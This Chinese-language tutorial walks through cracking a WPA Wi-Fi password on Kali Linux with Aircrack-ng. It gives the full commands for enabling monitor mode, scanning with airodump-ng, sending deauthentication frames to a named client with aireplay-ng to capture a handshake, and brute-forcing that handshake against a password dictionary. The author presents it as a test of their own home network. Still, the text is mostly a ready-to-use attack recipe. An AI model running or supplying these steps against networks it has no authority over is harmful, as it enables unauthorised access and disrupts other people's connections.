攻击机：kali

所采用的的无线网卡：D-LINK

采用的工具：Aircrack-ng

测试开始：

首先，打开kali，将无线网卡插入。弹出提示窗口，这里选择连接到虚拟机，选择kali虚拟机。

然后点击网络连接的标志，可以看到当前环境的wifi列表。

使用命令ifconfig和iwconfig，都可以看到wlan0已开启。

现在开始爆破。

这里的字典是我自己常用的，大家可以自行寻找字典。

（1）清除进程：airmon-ng check kall

（2）开启监听：airmon-ng start wlan0

可以看到已成功开启监听的进程。

再查看网卡状态。发现是wlan0mon，表示已进入监听状态

（3）开始扫描wifi，airodump-ng wlan0mon

BSSID：路由器的MAC地址

PWR：信号值，绝对值越低，说明信号越强

CH：当前路由器使用的信道

扫描出来了，这里选择PWR的绝对值小的，绝对值越小信号越高，这里都是负值，所以选择负值越最大的。

扫描的时候可能没法复制，大家选好要用的目标后，ctrl+c结束扫描，然后复制bssid。

我选择 这个-38的。

（4）开始监听该wifi：

airodump-ng --bssid CC:34:29:95:A5:4A -c 8 -w text wlan0mon

--bssid 后输入wifi的bssid

-c 后输入wifi 的信道值ch

-w 后是自己命名的监听到的握手包的名字，自己定义即可

（5）选择一个目标进行攻击，依次拿到握手包。这里的原理大家自行百度一下。

aireplay-ng -0 10 -a CC:34:29:95:A5:4A -c 50:2F:9B:14:86:0B wlan0mon

-0：制定攻击次数。

-a：路由器的bssid值

-c：目标mac地址

看到攻击成功。

（6）开始爆破密码：

aircrack-ng -a2 -b CC:34:29:95:A5:4A -w /usr/share/seclists/wifi_top2000_passwd.txt text-01.cap

-a2 代表WPA的握手包 -b 指定要破解的wifi的BSSID -w 指定字典文件

字典后接我们监听抓到的cap包

‘’

 这里是我日常家用的wifi所以字典很快就刨出来了。大家可以自行加强字典强度。